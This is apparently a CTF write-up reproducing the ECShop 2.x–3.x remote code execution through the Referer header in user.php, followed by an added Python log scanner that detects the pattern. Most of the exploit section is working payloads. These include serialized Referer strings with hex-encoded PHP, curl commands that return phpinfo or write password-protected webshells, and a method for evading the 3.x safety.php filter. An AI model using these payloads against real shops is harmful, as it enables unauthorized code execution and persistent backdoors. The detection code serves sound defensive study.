Ecshop 2.x-3.x RCE Vulnerability Reproduction


Called a reproduction, but it actually comes from a CTF challenge (Ecshop 3.x RCE).

Link: http://www.whalwl.cn:8030

1. Vulnerability Overview

In ECShop's user.php, the template variable passed to the display function is attacker-controllable, which leads to injection; combined with that injection, remote code execution can be achieved. The attacker does not need to log in to the site or perform any other action and can write a webshell remotely, so the impact is severe.

2. Affected Scope

All ECShop versions, including 2.x, 3.0.x, 3.6.x, etc.

3. Working the Challenge

The challenge says it is Ecshop, so robots.txt first.

Took a quick look and found nothing much.

So, on to nikto.

Still nothing happened, so searched Baidu for Ecshop vulnerabilities.

Found that there is code injection via the Referer on the user.php page.

Looking further

Bypassing truncation

Payload construction

3.x is slightly different

A brief note on the 3.x version.

In ECShop 3.x an includes/safety.php file was added, dedicated to stripping harmful data; its regex matches statements such as set, concat, information_schema, select from, and so on. No bypassable SQL statement has been found yet, but command execution can still be bypassed, because our earlier payload was encoded and therefore gets past the regex match. The only thing still matched is the union select statement; we can use the two parameters $arr['id'] and $arr['num'] at the same time, passing union and select separately, which bypasses the regex check.

2.x Payload: (phpinfo)

1)

Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:110:"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x7b24616263275d3b6563686f20706870696e666f2f2a2a2f28293b2f2f7d,10-- -";s:2:"id";s:4:"' /*";}554fcae493e564ee0dc75bdf2ebf94ca

2) Using the curl command in a terminal (returns phpinfo)

Payload:

curl http://aa0c90a3c2924ea9b3b4fa97c11f687e.n1.vsgo.cloud:15819/user.php -d 'action=login&vulnspy=phpinfo();exit;' -H 'Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'"'"'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca'

Writing a shell works the same way (vulnspy.php, password vulnspy)

Payload:

curl http://aa0c90a3c2924ea9b3b4fa97c11f687e.n1.vsgo.cloud:15819/user.php \
-d 'action=login&vulnspy=eval(base64_decode($_POST[d]));exit;&d=ZmlsZV9wdXRfY29udGVudHMoJ3Z1bG5zcHkucGhwJywnPD9waHAgZXZhbCgkX1JFUVVFU1RbdnVsbnNweV0pOz8%2BJyk7' \
-H 'Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'"'"'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca'

Webshell: (one-liner 1.php, password 1337)

Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}
 
During testing it was found that when injecting code by sending a request to user.php with an added Referer field, the webshell name can only be a single digit or letter.

3.x (when testing 3.x it was found that the curl method has a certain chance of being caught by the filtering mechanism)

Payload: (phpinfo)

Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a

Webshell: (one-liner 1.php, password 1337)


Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:289:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a

3.x getshell
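As an added detection example (not from the original post or the referenced write-ups), the following Python scans a constructed proxy-log export for the Referer pattern described above: the serialized ads| array bracketed by the site hash, with union and select split between the id and num keys as used against 3.x. The log format, sample rows, and hex placeholders are assumptions.

```python
import re

# Constructed proxy-log export, tab-separated: time, client, request, Referer.
# Rows 2 and 3 mirror the shape of the page's 2.x and 3.x payloads: a serialized
# PHP array wrapped by two 32-hex-char hashes, SQL split between the "id" and
# "num" keys. The hex literals are placeholders, not encoded PHP.
HASH = "0" * 32  # stands in for the site's hash in the constructed rows
SAMPLE_LOG = [
    "2024-01-01T10:00:00Z\t198.51.100.7\tGET /index.php\thttp://shop.example/index.php",
    "2024-01-01T10:00:05Z\t203.0.113.9\tPOST /user.php\t" + HASH
    + 'ads|a:2:{s:3:"num";s:46:"*/ union select 1,0x41414141414141414141,3-- -";'
    + 's:2:"id";s:3:"\'/*";}' + HASH,
    "2024-01-01T10:00:09Z\t203.0.113.9\tPOST /user.php\t" + HASH
    + 'ads|a:2:{s:3:"num";s:39:"*/SELECT 1,0x42424242424242424242,2-- -";'
    + 's:2:"id";s:11:"-1\' UNION/*";}' + HASH,
]

# The vector itself: a serialized array following the "ads|" marker.
WRAPPER = re.compile(r'ads\|(a:\d+:\{.*\})', re.DOTALL)
# key/value string pairs inside it (declared lengths are not validated here)
PAIR = re.compile(r's:\d+:"([^"]*)";s:\d+:"(.*?)";(?=s:\d+:"|\})', re.DOTALL)
HEX_LITERAL = re.compile(r'0x[0-9a-f]{16,}', re.IGNORECASE)


def referer_indicators(referer):
    """Return the ECShop-injection indicators found in one Referer value."""
    m = WRAPPER.search(referer)
    if not m:
        return []
    hits = ["serialized ads| array in Referer"]
    fields = dict(PAIR.findall(m.group(1)))
    # The vulnerable SQL uses id before num, so inspect their concatenation:
    # that is where "union" meets "select" even when each key alone passes safety.php.
    joined = (fields.get("id", "") + " " + fields.get("num", "")).lower()
    if "union" in joined and "select" in joined:
        hits.append("union/select split across id and num")
    if "/*" in joined and "*/" in joined:
        hits.append("comment splice /* ... */")
    if HEX_LITERAL.search(joined):
        hits.append("long hex literal (encoded payload)")
    return hits


def scan_log(lines):
    """Flag log rows whose Referer carries the ECShop injection pattern."""
    findings = []
    for n, line in enumerate(lines, start=1):
        parts = line.split("\t")
        if len(parts) == 4 and (hits := referer_indicators(parts[3])):
            findings.append({"row": n, "client": parts[1], "indicators": hits})
    return findings
```

A benign Referer never carries the ads| serialized array, so the first indicator alone is already a strong signal; the remaining ones confirm the SQL splice.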

References:

https://www.vulnspy.com/cn-ecshop-3.x.x-rce-exploit/

https://www.vulnspy.com/cn-ecshop-2.7.x-rce-exploit/

https://xz.aliyun.com/t/2689
